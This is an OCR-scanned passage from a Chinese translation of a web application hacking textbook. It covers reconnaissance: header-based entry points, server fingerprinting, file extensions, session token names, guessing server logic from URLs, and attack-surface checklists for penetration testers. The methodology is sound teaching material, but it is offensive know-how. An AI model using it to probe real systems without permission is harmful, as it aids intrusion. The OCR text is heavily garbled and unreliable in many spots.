为 data 的 参数 ， 因 而 提交 各 种 攻击 有 效 载 位 作 为 这 个 参数 的 值 ， 对 其 进行 便 单 处 理 ， 那 么 可 能 
会 进 漏 处 理 查 询 字 符 果 过程 中 存在 的 许多 漏洞 。 相 反 ,， 如 采 详 细 分 析 它 使 用 的 定制 格式 并 将 有 效 
载 何 提交 到 骨 入 的 XML 数 据 字 段 中 ， 立 即 就 会 发 现 严 重 缺 陷 ， 如 SQL 注 入 或 路 径 裔 历 。 

3. HTTP 消 息 头 

许多 应 用 程序 执行 定制 的 日 志 功 能 , 并 可 能 会 记录 HTTP 消 息 头 (如 Referer 和 User-Agent ) 
的 内 容 。 应 始终 将 这 些 消 息 头 视 为 基于 输入 的 攻击 的 可 能 进入 点 。 

一 些 应 用 程序 还 对 Referezr 消 息 头 进行 其 他 处 理 。 例 如 , 应 用 程序 可 能 检测 到 用 户 已 通过 搜 
索引 擎 到 达 , 并 提供 针对 用 户 的 搜索 碍 询 的 定制 啊 应 。 一 些 应 用 程序 可 能 会 回应 搜索 术语 ， 或 者 
尝试 突出 显示 响应 中 的 匹配 表达 式 。 一 些 应 用 程序 则 通过 动态 添加 HTML 关 键 字 等 内 容 ， 并 包含 
搜索 引擎 中 最 近 的 访问 者 搜索 的 字符 串 ， 以 提高 它们 在 搜索 引擎 中 的 排名 。 这 时 ,通过 提出 大 量 
包含 经 过 适当 设计 的 Referer URE 的 请 求 ， 就 可 以 不 断 在 应 用 程序 的 啊 应 中 注入 内 容 。 

近年 来 出 现 了 一 个 重要 的 趋势 ， 即 应 用 程序 问 通 过 不 同 设备 ( 如 笔记 本 电脑 、 移 动 电话 、 平 
板 电 脑 ) 进 行 访问 的 用 户 呈 现 不 同 的 内 容 。 应 用 程序 通过 检查 User-aAgent 消 息 头 实现 这 一 目的 。 
除了 能 为 直接 在 User-aAgent 消 息 头 本 身 中 实施 的 基于 输入 的 攻击 提供 “便利 ”外 ， 这 种 行为 还 
可 以 揭示 应 用 程序 中 的 其 他 受 攻 击 面 。 通 过 伪造 流行 移动 设备 的 User-aAgent 消 息 头 ， 攻 击 者 可 
以 访问 其 行为 与 主要 界面 不 同 的 简化 用 户 界 面 。 由 于 这 种 界面 通过 服务 硕 闪 应 用 程序 中 的 不 同 代 
码 路 径 生成 , 并且 可 能 并 未 经 过 严格 的 安全 测试 , 因此 , 攻击 者 就 可 以 确定 主要 应 用 程序 界面 中 
并 不 存在 的 汤 洞 ( 如 跨 站 点 脚本 )。 






























































提示 “Burp Intruder 提 供 了 一 个 内 置 的 有 效 载荷 列表 ， 其 中 包含 大 量 针 对 不 同类 型 设 
Y 备 的 用 户 代理 字符 串 。 攻 击 者 可 以 执行 一 次 简单 的 攻击 ， 即 向 提供 不 同 用 户 代 理 字 符 


串 的 应 用 程序 主页 面 提 出 一 个 GET 请 求 ， 然 后 检查 Burp Intruder 返 回 的 结果 ， 从 中 确定 
表明 使 用 了 不 同 用 户 界面 的 反 负 现象 。 








除了 针对 浏览 右上 默认 发 送 或 应 用 程序 组 件 添加 的 HTTP 请 求 消息 头 实 施 攻击 外 ， 有 些 时 候 ， 
攻击 者 还 可 以 通过 添加 应 用 程序 可 能 会 处 理 的 其 他 消 肯 头 来 实施 成 功 的 攻击 。 例 如, 许多 应 用 程 
序 会 对 客户 的 IP 地 址 进行 菏 种 处 理 ， 以 执行 日 志 、 访 问 控 制 或 用 户 地 理 位 置 定位 等 功能 。 通 篆 ， 
应 用 程序 通过 平台 API 可 以 访问 客户 的 网 络 连 接 IP 地 址 。 但 是 ， 如 果 应 用 程序 位 于 负载 均衡 器 或 
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代理 服务 器 之 后 ， 应 用 程序 可 能 会 使 用 Xx-Forwarded-For 请 求 消息 涉 ( 如 果 存 在 ) 中 指定 的 IP 
地 址 。 然后 , 开发 者 可 能 误 认 为 该 IP 地 址 是 安全 的 , 并 以 危险 的 方式 处 理 该 地 址 。 在 这 种 情况 下 ， 
通过 添加 适当 设计 的 X-Forwaraded-For 消 息 头 ， 攻 击 考 就 可 以 实施 SQL 注入 或 持续 的 跨 站 点 脚 
水 攻击 

4. 带 外 通道 

最 后 一 类 用 户 输入 进入 点 是 带 外 通道 , 应 用 程序 通过 它 接 收 攻击 者 能 够 控制 的 数据 。 如 果 只 
是 检查 应 用 程序 生成 的 HTTP 流 量 ， 攻 击 者 可 能 根本 无 法 检测 到 其 中 一 些 进 入 点 ， 发 现 它们 往往 
需要 全 面 了 解 应 用 程序 所 执行 的 各 种 功能 。 通 过 带 外 通道 接收 用 户 可 控制 的 数据 的 Web 应 用 程序 
包括 : 

口 处 理 并 显示 通过 SMTP 接 收 到 的 电子 邮件 消息 的 Web 邮 件 应 用 程序 ; 

口 具有 通过 HTTP 从 其 他 服务 絮 获 取 内 容 功 能 的 发 布 应 用 程序 ; 

口 使 用 网 络 串 探 器 收集 数据 并 通过 Web 应 用 程序 界面 显示 这 些 数 据 的 入 侵 检测 应 用 程序 ; 

口 任何 提供 由 非 浏 览 需 用 户 代 理 使 用 的 API 接 口 (如 果 通 过 此 接口 处 理 的 数据 与 主 Web 应 用 

程序 共享 ) 的 应 用 程序 ， 如 移动 电话 应 用 程序 。 























4.2.2 ”确定 服务 器 端 技术 


通常 ， 我 们 可 以 通过 各 种 线索 和 指标 确定 服务 右 所 采用 的 技术 。 

1. 提取 版 本 信息 

许多 Web 服 务 天 公开 与 Web 服 务 融 软件 本 身 和 所 安 效 组 件 有 关 的 详细 版 本 信息 。 例 如 ,， HTTP 
Servezr 消 息 头 揭示 大 量 与 安 半 软件 有 关 的 信息 : 

Server: Apache/1.3.31 {Unix) mod gzip/1.3.26.1a mod auth passthrough/ 


1.8 mod log bytes/1.2 mod bwlimited/1.4 PHP/4.3.9 FrontPage/ 
5.0.2.2634a moqd ssl1l/2.8.20 OpenSSL/0.9.7a 


除 server 消 息 头 外 ， 下 列 位 置 也 可 能 揭露 有 关 软 件 类 型 和 版 本 的 信息 : 

口 建立 HTML 页 面 的 模板 ; 

口 定制 的 HTTP 消 息 头 ; 

DURIL 查 询 字 符 串 参数 。 

2. HTTP 指 纹 识别 

从 理论 上 说 ， 服 务 器 返回 的 任何 信息 都 可 加 以 定制 或 进行 有 意 伪造 ，Servez 消 息 头 等 内 容 
也 不 例外 。 大 多 数 应 用 程序 服务 需 软 件 允 许 管理 员 配 置 在 Server HTTP 消 息 头 中 返回 的 旗 标 。 
尽管 采取 了 这 些 防御 措施 ,但 通常 而 言 ， 蓄 意 破 坏 的 攻击 者 仍然 可 以 利用 Web 服 务 需 的 其 他 行为 
确定 其 所 使 用 的 软件 ， 或 者 至 少 缩小 搜索 范围 。HTTP 规 范 中 包含 许多 可 选 或 由 执行 者 自行 决定 
是 否 使 用 的 内 容 。 另 外 ,许多 Web 服 务 需 还 以 各 种 不 同 的 方式 违背 或 扩展 该 规范 。 因 此 ， 除 通过 
Servez 消 息 头 判断 外 ， 还 可 以 使 用 大 量 迁 回 的 方法 来 识别 Web 服 务 硕 。 在 图 4-11 中 ，Httprecon 
工具 正 对 EIS 应 用 程序 进行 扫描 ， 并 以 不 同 的 可 信 度 报告 各 种 可 能 的 Web 服 务 姨 。 
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下 
区 httprecon 7.3 - http://eis:80/ 








File Configuration Fingerprinting Reporting Help 
Target (上 &pache 2.0.54] 


[http:a7 "| ss 3 ~ 点 nalyze 






PFT existing | GET long regquest | GET non-existing | GET wrong protocol | HEA2D axisting | DPTION 4 | 



















| Name |Hhis |Matcr%| ^ 
WW Apache 2.0.54 104 100 

WW Apachc 2.0.55 989 94.23.. 

WW Apache 2.2.4 91 87.5 

WW Apache 2.2.11 90 86.53 

A Microsoftll5 6.0 90 86.53 

WW Apache 2.0.46 88 84.61 

WW apache223 86 82.69.. S 
hh 由 1 4 一 一 Mr m4 一 一 











fT HTML Repart... Done. 











图 4-11 ”Httprecon 正 在 识别 EIS 应 用 程序 


3. 文件 扩展 名 

URL 中 使 用 的 文件 扩展 名 往往 能 够 揭示 应 用 程序 执行 相关 功能 所 使 用 的 平台 或 编程 语言 。 
例如 : 

DQ asp Milcrosoft Active Server Pages; 

口 aspx——Microsoft ASPNET; 

口 j] sp Java Server Pages ; 

D cfm Cold Fuslon ; 

口 php 一 一 PHP 坎 言 : 

DQ d2w———WebSphere; 

Dpl Perli 噩 言 : 

口 py 一 Python 语 言 ; 

D 911 一 一 通常 为 编译 型 本 地 代码 〈C 或 C++ ) 

口 nsf 或 ntf 

即使 应 用 程序 在 它 公 布 的 内 容 中 并 不 使 用 特定 的 文件 扩展 名 , 但 我 们 一 般 还 是 能 够 确定 服务 
从 是 否 执行 文 持 该 扩展 名 的 技术 。 例 如 ， 如 采 应 用 程序 上 安 猴 有 ASPNET ， 请 求 一 个 不 存在 
的 .aspx 文 件 将 返回 一 个 由 ASP.NET 框 架 生 成 的 错误 页 面 ， 如 图 4-12 所 示 。 但 是 ,请求 一 个 扩展 
名 不 同 的 不 存在 的 文件 将 返回 一 个 由 Web 服 务 融 生成 的 向 规 钳 误 消息 ， 如 网 4-13 所 示 。 

使 用 前 面 描述 的 自动 化 内 容 查 找 技巧 ,我们 能 够 请 求 大 量 常 见 的 文件 扩展 名 , 并 迅速 确定 服 
务 人 是 否 执行 了 任何 相关 技术 。 




















Lotus Domino, 
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Eile Edit View History Bookmarks Tools Help 
me Cc EE 人 AN |) http://mdsec.net/foo.aspx 安 -| | 归 - Google 
| ie [+ 一 




















Server Error in /Application. 


The resource cannot be found. 


Description: HTTP 404. The resource you are looking for (or one of its dependencies) could have been reroved, had is name changed, or is temporarily unavailable. 
Please review the following URL and make sure that i is spelled correctly. 





Requested URL: /foo.aspx 











图 4-12 一 个 指出 服务 器 上 安装 有 ASP.NET 平 台 的 定制 错误 页 面 





YThepage cannotbefound- MozillaFirefox “seallse 
File Edit View History Bookmarks Iools Help 
二 尖 一 CC XX 人 [|] httpy/mdsecnet/foo.aspxk 他 -| 9- 区 P| 








| LL) The page cannot be found [4 ~ 











The page cannot be found 


The page You are |ocking for might have been removed, had its name cnanged, or 
is temporarily unavailable. 三 


Please try the following: 





es Make sure that the Web site address displayed in the address bar of your 
browser is spelled and formatted correctly. 

es If you reached this page by clicking a link, contact the Web site 
administrator to alert them that the link is incorrectly formatted. 

se Click the Back button to try another link. 





HTTP Error 404 - File or directory not found. 


| Internet Information Services (IIS) 





Done 





图 4-13 ”请 求 一 个 无 法 识别 的 文件 扩展 名 时 生成 的 常规 错误 消息 


之 所 以 出 现 上 述 不 同 的 行为 ,是 因为 许多 Web 服 务 器 将 特殊 的 文件 扩展 名 映射 到 特定 的 服务 
器 端 组 件 中 。 不 同 的 组 件 处 理 错误 的 方式 (包括 请 求 不 存在 的 内 容 ) 也 各 不 相同 。 图 4-14 说 明了 
默认 安装 IIS 5.0 时 将 各 种 扩展 名 映射 到 不 同 处 理 程序 DLL 的 情况 。 


Application Configuration x| 





App Mappings | App Dptions 一 App Debugging | 


CWINNT"System32\ webhits. dll GET.HEAD 
CWINNTSystem32,idg.dll GET.HEAD 
CwINNTSystem32%idg.dll GET.HEAD 
CWINNT\System32\inetsry\asp.dll GET.HEAD 
C:\WINNT\System32N\inetsryasp.dll GET.HEAD 
CWINNT"System32\inetsry,asp. dl GET.HEAD 
C: WINNTSystem32N\inetsryasp. dl GET.HEAD 
CSINNT'system32"inetsrv\asp.dll GET.POST. 


CVINNTSystem32N\inetsry shttpodbe.dll OPTIONS. 
CWINNT"System32N\inetsrysssinc.dll GET.POST 


已 : VWINNTSystem32\inetsrv ,ssinc. dl GET.POST 
PAININITAGueham32inakerwssinc dl _ BET Pa 
上 


4 
点 dd | Eat | ENSYE | 





Lancel | Spply | Help | 
图 4-14 IIS 5.0 中 的 文件 扩展 名 映射 
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分 析 请 求 文件 扩展 名 时 生成 的 各 种 错误 消息 可 以 确定 该 文件 扩展 名 映射 是 否 存在 。 在 某 些 情 
况 下 ， 发 现 一 个 特殊 的 映射 可 能 表示 存在 一 个 Web 服 务 器 漏洞 。 例 如 ， 过 去 ，IHS 中 的 .printer 
和 .ida/ .idqq 处 理 程序 另 于 遭受 缓冲 区 溢出 攻击 。 

类 似 于 下 面 的 URL 是 男 外 一 种 值得 注意 的 第 用 识别 方法 : 

https://wahh-app/news/0,,2-421206,00.hntml 
URL 末 尾 用 逗号 分 阳 的 数字 通 弟 由 Vignette 内 容 管 理 平 台 生 成 。 

4. 目录 名 称 

一 些 子 目 录 名 称 常常 表示 应 用 程序 使 用 了 相关 技术 。 例 如 : 


D servlet 





























Java servlet:; 
DQ pls Oracle Application Server PL/SQL 网 关 ; 
口 cfdocs 或 cfide Cold Fusion ; 
口 SilverStream SilverStream Web 服 务 佑 
口 WebObjects 或 {function}.woa Apple WebObjects; 
DQ ralls 
5. 会 话 令 牌 
许多 Web 服 务 硕 和 Web 应 用 程序 平 侣 黑 认 生成 的 会 话 令 牌 名 称 也 揭示 其 所 使 用 技术 的 信息 ， 
例如 : 
DQ JSESSIONID Java 半 
DD ASPSESSIONID er IIS 服 务 春 
DQ ASPNET Sessionld—— Microsott ASPNET; 
DD CFID/CFTOKEN Cold Fuslon ; 
DQ PHPSESSID 一 -一 PHP。 
第 三 方 代码 组 件 
i 用 程序 整合 第 三 方 代码 组 件 执行 肖 见 的 功能 ， 如 购物 车 、 登 录 机 制 和 公告 脾 。 这 
些 组 件 可 能 为 开源 代码 , 或 者 从 外 部 软件 开发 者 购买 而 来 。 如 末 是 这 样 ， 那么 相同 的 组 件 会 出 现 
在 因特网 上 的 大 量 其 他 Web 应 用 程序 中 ， 可 以 根据 这 些 组 件 了 解 应 用 程序 的 功能 。 通 第， 其 他 应 
用 程序 会 利用 相同 组 件 的 不 同 特性 ， 确 保 攻 击 者 能 够 确定 目标 应 用 程序 的 其 他 隐藏 行为 和 功能 。 
而 且 ， 软 件 中 可 能 包含 其 他 地 方 已 经 揭示 的 某 些 已 知 漏洞 ,攻击 者 也 可 以 下 载 并 安 交 该 组 件 ， 对 
它 的 源 代 码 进 行 分 析 或 以 受 控 的 方式 探查 其 中 存在 的 缺陷 。 




















Ruby on Ralls。 








合 ， 





























渗透 测试 步骤 





(1) 确定 全 部 用 户 输入 入口 点 ,包括 URL、 查 询 字 符 串 参数 、PosT 数 据 、cookie 和 其 他 由 
应 用 程序 处 理 的 HTTP 消 息 头 。 

(2) 分 析 应 用 程序 使 用 的 查询 字符 串 格式 。 如 果 应 用 程序 并 未 使 用 第 3 章 描 述 的 标准 格式 ， 
设法 了 解 它 如 何 通 过 URL 提 交 参 数 。 几 乎 所 有 定制 方案 仍然 使 用 名 / 值 模型 的 某 种 变化 形式 ， 
因此 要 设法 了 解 名 / 值 对 如 何 被 封装 到 已 经 确定 的 非 标 准 URL 中 。 
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(3) 确定 任何 回应 用 程序 处 理 过 程 引 入 用 户 可 控制 或 其 他 第 三 方 数据 的 带 外 通道 。 

(4) 查看 应 用 程序 返回 的 HTTP 服务 硕 着 标 。 注 意 , 在 某 些 情况 下 , 应 用 程序 的 不 同 区 域 由 
不 同 的 后 端 组 件 处 理 ， 因 此 可 能 会 收 到 不 同 的 Servezr 消 息 头 。 

(5) 检查 所 有 定制 HTTP 消 息 头 或 HIML 源 代码 注释 中 包含 的 任何 其 他 软件 标识 符 。 

(6) 运行 Httprecon 工 具 识别 Web 服 务 壤 。 

(7) 如 果 获 得 关于 Web 服 务 闫 和 其 他 组 件 的 详细 信息 ， 搜 索 其 使 用 的 软件 版 本 ， 确 定 在 发 
动 攻 击 时 可 供 利 用 的 所 有 源 润 ( 请 参阅 第 18 草 了解 相关 内 容 )。 

(8) 分 析 应 用 程序 URL 列 表 ， 确 定 任何 看 似 重 要 的 文件 扩展 名 、 目 录 或 其 他 提供 服务 器 使 
用 技术 相关 线索 的 内 容 。 

(9) 分 析 应 用 程序 发 布 的 全 部 会 话 令 牌 的 名 称 ， 确 定 其 使 用 的 技术 。 

(10) 使 用 党 用 技术 列表 或 Google 推 测 服 务 天 所 使 用 的 技术 , 或 者 查找 其 他 明显 使 用 相同 技 
术 的 Web 站 点 和 应 用 程序 。 

(11) 在 Google 上 搜索 可 能 属于 第 三 方 软件 组 件 的 任何 不 稼 见 的 cookie、 脚 本 、HTTP 消 息 头 
名 称 。 如 果 发 现 使 用 相同 组 件 的 应 用 程序 ， 对 其 进行 分 析 , 确定 该 组 件 文 持 的 任何 其 他 功能 和 
参数 ， 并 确定 目标 应 用 程序 是 否 具有 这 些 功 能 、 使 用 这 些 参 数 。 注 意 ， 由 于 品牌 定制 ， 相 同 第 
三 方 组 件 在 每 个 应 用 程序 中 的 外 观 可 能 截然 不 同 , 但 其 核心 功能 ( 包括 脚本 和 参数 名 称 ) 往往 
并 无 变化 。 如 有 可 能 ， 下载 并 安 法 组 件 ， 对 其 进行 分 析 以 充分 了 解 它 的 功能 、 查 找 其 中 存在 的 
所 有 漏洞 。 同 时 ， 碍 询 已 知 漏洞 库 ， 确 定 相 关 组 件 中 存在 的 所 有 已 知 漏洞 。 
























































4.2.3 ”确定 服务 器 端 功 能 


通过 留意 应 用 程序 问 客 户 剖 披露 的 线索 ， 通 第 可 推断 与 服务 带 端 功能 和 结构 有 关 的 大 量 信 
， 或 者 至 少 可 做 出 有 根据 的 猜测 。 

1. 仔细 分 析 请 求 

以 下 面 用 于 访问 搜索 功能 的 URL 为 例 : 


https://wahh-app.com/calendar.Jsp?name=new%20applicants&isExpired= 
O&KstartDate=22%2F09%2F2010&endDate=22%2F03%2F2011&OrderBy=name 


可 见 ，.jsp 文 件 扩 展 名 表示 它 使 用 Java Server Pages。 据 此 可 以 推 上 新: 搜索 功能 从 索引 系统 
或 数据 库 获取 信息 ; ordqerBy 人 参数 暗示 它 使 用 后 端 数据 库 ， 提 交 的 值 将 被 SQL 查询 的 ORDER BY 
子 句 使 用 。 和 数据 库 查询 使 用 的 其 他 参数 一 样 ， 这 个 参数 也 非常 容易 受到 SQL 注 入 攻击 ( 请 参阅 
第 9 草 了 解 相关 内 容 )。 

在 这 些 参 数 中 ，isExpired 字 上 段 同样 值得 我 们 注意 。 很 明显 , 这 是 一 个 指定 搜索 查询 是 否 应 
包含 已 到 期 内 容 的 布尔 型 标志 。 如 采 应 用 程序 的 设计 者 并 不 希望 用 户 访 问 任 何 到 期 的 内 容 , 将 这 
个 参数 由 0 改 为 1 就 能 够 确定 一 个 访问 控制 漏洞 ( 请 参阅 第 8 章 了 解 相 关内 容 )。 

下 面 的 URL 人 允许 用 户 访 问 内 容 管 理 系 统 ， 其 中 包含 男 外 一 些 线 索 : 











ET 
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https://wahh-app.com/workbench.aspx?temlate=NewBranch.tpl&loc= 
/default&ver=2.31&edit=false 


这 里 的 .aspx 文 件 扩展 名 表示 这 是 一 个 ASPNET 应 用 程序 。 而 且 ， 很 可 能 temp1late 人 参数 用 
于 指定 一 个 文件 名 ，1loc 参 数 用 于 指定 一 个 目录 。 很 明显 , 文件 扩展 名 .tpl 证 明了 上 述 推 论 ， 而 
位 置 /aefault 很 有 可 能 是 一 个 目录 名 称 。 应 用 程序 可 能 获得 指定 的 模板 文件 ， 并 将 其 内 容 包含 
在 啊 应 中 。 这 些 参 数 非 浓 容 易 受 到 路 径 遍 历 攻 击 ， 人 允许 攻击 者 恋 取 服 务 硕 上 的 任何 文件 〈 请 参阅 
第 10 革 了 解 相 关内 容 )。 

同样 值得 注音 的 是 edit 参 数 ， 它 被 设 置 为 假 。 将 这 个 值 更 改 为 真 会 修改 注册 功能 ， 可 能 允 
许 攻击 者 编辑 应 用 程序 开发 者 不 希望 用 户 编辑 的 数据 。 由 ver 参 数 并 不 能 推断 出 任何 有 用 的 线 
索 ， 但 修改 这 个 参数 可 能 会 使 应 用 程序 执行 一 组 可 被 攻击 者 利用 的 不 同 功能 。 

最 后 ， 我 们 来 分 析 以 下 请 求 ， 它 用 于 回应 用 程序 管理 员 提 出 问题 : 

POST /feedback.php HTTP/1.1 


Host: wahh-app.com 
Content-Length: 389 





























from=user@wahh-mail.com&to=helpdesk@wahh-app. com&subject= 
Problemt+logging+in&message=Pleasethelp... 


和 其 他 示例 一 样 ，.php 文 件 扩展 名 表示 它 使 用 PHP 语 言 执行 功能 。 而且, 应 用 程序 极 有 可 能 
正 通过 接口 与 一 个 外 部 电子 邮件 系统 连接 ; 同时 , 它 显 示 使 用 电子 邮件 的 相关 字段 回 那 个 系统 提 
区 用 户 可 控制 的 输入 。 攻 击 者 可 利用 这 项 功能 加 任何 接收 者 发 送 任意 邮件 , 并 且 , 其 中 所 有 字段 
都 易于 遭受 电子 邮件 消息 头 的 注入 攻击 〈 请 参阅 第 10 章 了 解 相关 内 容 ) 




















提示 ”在 猜测 请 求 不 同 部 分 的 功能 时 ， 通 党 有 必要 从 整个 URL 和 应 用 程序 的 角度 进行 
Y 考虑 。 同 样 以 Extreme Internet Shopping 应 用 程序 中 的 以 下 URL 为 例 : 
http://eis/pub/media/117/view 
在 功能 上 ， 此 URL 相 当 于 以 下 URL: 
http://eis/manager?schema=pub&type=media&id=117&action=view 
虽然 并 不 肯定 ， 但 media 资 源 集 中 很 可 能 包含 资源 117， 并 且 应 用 程序 正 对 该 资源 
执行 相当 于 view 的 操作 。 检 查 其 他 URL 将 有 助 于 确认 这 一 点 。 


首先 需要 考虑 将 view 操 作 更 改 为 其 他 可 能 的 操作 ， 如 edit 或 add。 但是， 如 果 将 其 更 
改 为 addq 并 且 猜 测 是 正确 的 ， 则 该 操作 可 能 相当 于 添加 一 个 ID 为 117 的 资源 。 这 一 操作 
将 会 失败 ， 因为 已 经 存在 一 个 有 D 为 117 的 资源 。 最 佳 方案 是 ,寻找 DD 值 大 于 观察 到 的 最 
大 ID 值 的 add 操 作 ， 或 选择 任意 较 大 的 值 。 例 如 ， 可 以 请 求 以 下 URL: 


http://eis/pub/media/7337/add 

此 外 , 还 有 必要 通过 修改 media ( 同时 保留 类 似 的 URL 结 构 ) 来 寻找 其 他 数据 集合 : 
http://els/pub/paves/l1/view 

http://eis/pub/users/1/view 
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渗透 测试 步 又 





(1) 检查 提交 到 应 用 程序 的 全 部 参数 的 名 称 和 参数 值 ， 了 解 它们 支持 的 功能 。 
(2) 从 程序 员 的 角度 考虑 问题 ， 想 象 应 用 程序 可 能 使 用 了 哪些 服务 器 端 机 制 和 技术 来 执行 
能 够 观察 到 的 行为 。 


2. 推测 应 用 程序 的 行为 

通 第 ,应 用 程序 以 统一 的 方式 执行 其 全 部 功能 。 这 可 能 是 因为 不 同 的 功能 由 同一 位 开发 者 编 
写 , 或 者 可 巡 循 相同 的 设计 规范 ,或 者 共 至 相同 的 代码 组 件 。 在 这 种 情况 下 ， 我们 可 轻松 推 凯 出 
服务 融 闪 有 某 个 领域 的 功能 ， 并 据 此 类 推 其 他 领域 的 功能 。 

例如 ， 应 用 程序 可 能 会 执行 茶 种 全 局 输入 确认 检查 ， 如 在 处 理 前 靖 化 各 种 评 在 的 恶意 输入 。 
硝 定 一 个 SQL 育 注 漏洞 后 ,会 遇 到 如 何 利用 它 的 问题 ， 因 为 专门 设计 的 请 求 正 被 输入 确认 逻辑 以 
不 可 见 的 方式 修改 。 然 而, 应 用 程序 中 可 能 还 有 其 他 功能 为 正在 执行 的 净化 提供 良好 的 反馈 , 例 
如 ， 将 用 户 提交 的 数据 “反射 ”给 浏览 融 的 功能 。 可 以 使 用 这 项 功能 测试 不 同 编码 及 SQL 注 和 人 有 
效 载 傈 的 各 种 变化 形式 的 有 效 性 , 判定 在 应 用 输入 确认 逻辑 后 ,必须 提交 哪些 原始 输入 才能 获得 
想 要 的 攻击 字符 串 。 如 果 半 和 运 ,会 发 现 整 个 应 用 程序 使 用 相同 的 确认 机 制 ， 让 攻击 者 可 以 利用 注 
入 漏洞。 

当 在 客户 站 保存 敏感 数据 时 , 一 些 应 用 程序 可 使 用 定制 的 模糊 处 理 方案 , 防止 用 户 随意 查阅 
和 修改 这 些 数 据 (请 参阅 第 5$ 章 了 解 相 关内 容 ) 由 于 只 能 访问 一 个 经 过 模糊 处 理 的 数据 样本 ,这 
类 模糊 处 理 方案 可 能 非 稼 难以 解 详 。 然 而 , 应 用 程序 中 可 能 具有 茶 些 功能 , 用 尸 回 其 提交 模糊 字 
从 串 即 可 获得 原始 字符 串 。 例如 ,错误 清晨 中 可 能 包含 导 任 错误 的 反 棕 糊 处 理 数据 。 如 来 整个 应 
用 程序 使 用 相同 的 模糊 处 理 方案 ， 就 可 以 从 菏 个 位 置 ( 如 cookie 中 ) 提取 一 个 模糊 字符 串 ， 将 其 
提交 给 其 他 功能 , 解 详 出 它 的 意义。 而 且 ， 我 们 还 可 以 对 模糊 处 理 方案 执行 逆向 工程 ， 系统 地 癌 
该 功能 提交 各 种 数据 并 监控 反 模 糊 处 理 后 得 到 的 结 采 。 

最 后 ,应 用 程序 处 理 各 种 错误 的 方式 并 不 一 致 ， 一 些 区 域 合理 防御 并 处 理 错误 ,而 男 外 一 些 
区 域 则 简单 放弃 错误 ， 回 用 户 返回 元 长 的 调试 信息 〈 请 参阅 第 15 章 了 解 相关 内 容 ) 在 这 种 情况 
下 ,我 们 可 以 从 茶 个 区 域 返 回 的 错误 消息 中 收集 相关 信息 , 并 将 其 应 用 于 合理 处 理 错误 的 其 他 区 
域 。 例 如 ,通过 系统 化 地 操纵 请 求 参数 并 监控 得 到 的 错误 消息 ， 可 以 判定 相关 应 用 程序 组 件 的 内 
部 结构 和 逮 辑 ; 幸运 的 话 会 发 现 这 个 结构 的 某 些 方面 还 被 沿用 到 其 他 区 域 。 
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(1) 确定 应 用 程序 中 任何 可 能 包含 与 其 他 区 域内 部 结构 和 功能 有 关 的 线 肥 的 位 置 。 
(2) 即使 暂时 无 法 获得 任何 肯定 的 结论 ， 但 是 ， 在 后 期 试图 利用 任何 潜在 的 漏洞 时 ， 确 害 
的 情况 可 能 会 有 用 。 
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3. 隔离 独特 的 应 用 程序 行为 

有 时 , 情况 可 能 恰恰 相反 。 许多 可 菲 或 成 熟 的 应 用 程序 采用 一 任 的 框 染 来 防止 各 种 类 型 的 攻 
击 ， 如 跨 站 点 脚本 、SQL 注 入 和 未 授权 访问 。 在 这 类 情况 下 ， 最 可 能 发 现 源 洞 的 区 域 ， 是 应 用 程 
序 中 后 续 添 加 或 “拼接 ”而 其 常规 安全 框 染 不 会 处 理 的 部 分 。 此 外 ,这些 部 分 可 能 没有 通过 验证 、 
会 话 管理 和 访问 控制 与 应 用 程序 进行 正确 连接 。 一 般 情 况 下 ， 通 过 GUI 外 观 、 参 数 合 名 约定 方面 
的 差 寞 ,或 者 直接 通过 源 代码 中 的 注释 即 可 确定 这 些 区 域 。 





























渗透 测试 步 又 








(1) 记录 其 使 用 的 标准 GUI 外 观 、 参 数 命 名 或 导航 机 制 与 应 用 程序 的 其 他 部 分 不 同 的 任何 





(2) 同时 记录 可 能 在 后 续 添 加 的 功能 ,包括 调试 功能 、CAPTCHA 控 件 、 使 用 情况 跟踪 和 第 
三 方 代码 。 

(3) 对 这 些 区 域 进 行 全 面 检查 ， 不 要 假定 在 应 用 程序 的 其 他 区 域 实施 的 标准 防御 在 这 些 区 
域 也 同样 适用 。 














4.2.4 解析 受 攻击 面 


解析 过 程 的 最 后 一 个 步骤 是 确定 应 用 程序 暴露 的 各 种 受 攻击 面 , 以 及 与 每 个 受 攻 击 面 有 关 的 
洪 在 漏洞 。 下 面 简要 说 明 活 透 测试 员 能 够 确定 的 一 些 主要 行为 和 功能 ,以 及 其 中 最 可 能 发 现 的 漏 
洞 。 本 书 的 其 他 内 容 将 详细 讨论 渗透 测试 员 如 何在 实际 操作 过 程 中 探测 并 利用 这 些 漏洞 。 

口 客 户 端 确认 一 一 服务 器 没有 采用 确认 检查 。 

口 数据 库 交 互 一 一 SQL 注 入 。 

口 文件 上 传 与 下 载 一 一 路 径 遍 历 漏洞 、 保 存 型 蜂 站 点 脚本 。 

口 显示 用 户 提交 的 数据 一 一 路 站 点 脚本 。 

口 动态 重 定 回 一 一 重 定 回 与 消息 头 注入 攻击 。 

口 社交 网 络 功 能 一 一 用 户 名 枚 举 、 保 存 型 跨 站 点 脚本 。 

口 登录 一 一 用 户 名 枚 举 、 脆 弱 密 码 、 能 使 用 人 蛮 力 。 

口 多 阶段 登录 一 一 登录 缺陷 。 

口 会 话 状态 一 一 可 推测 出 的 令 牌 、 令 牌 处 理 不 安全 。 

口 访问 控制 一 一 水 平权 限 和 和 圣 直 权限 提升 。 

口 用 户 伪 装 功 能 一 一 权限 提升 。 

口 使 用 明文 通信 一 一 会 话 动 持 、 收 集 证书 和 其 他 敏感 数据 。 

口 站 外 链接 一 -Referer 消 息 头 中 查询 字符 串 人 参数 泄 漏 。 

口 外 部 系统 接口 一 一 处 理会 话 与 /或 访问 控制 的 快捷 方式 。 

口 错误 消息 诗 息 .泄漏 。 
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口 电子 邮件 交互 一 一 电子 邮件 与 命令 注入。 

口 本 地 代码 组 件 或 交互 一 一 缓冲 区 溢出 。 

口 使 用 第 三 方 应 用 程序 组 件 一 一 已 知 漏洞 。 

口 已 确定 的 Web 服 务 需 软件 一 一 常见 配置 薄弱 环节 、 已 知 软件 程序 缺陷 。 








4.2.5 解析 Extreme Internet Shopping 应 用 程序 


解析 EIS 应 用 程序 的 内 容 和 功能 后 ， 攻 击 者 可 以 通过 各 种 路 径 对 该 应 用 程序 实施 攻击 ， 如 
图 4-15 所 示 。 





4 burp suite professional 
burp intruder repeater window help 
target | proxy | spider | scanner | intruder | repeater | sequencer | decoder | comparer | options | alerts 


site map | 


PTEis 
9- 镜 auth 
简 ForgotPassword 
~ 渤 Looin 
[LD Profile 
加 | ResetFassword 
[LL register 
?9- 钨 core 
9 带 sitestals 
国 pacelD=/home&display=ranklhitsltime 
?和 色 gb 
> 娩 gbookphp Cm 
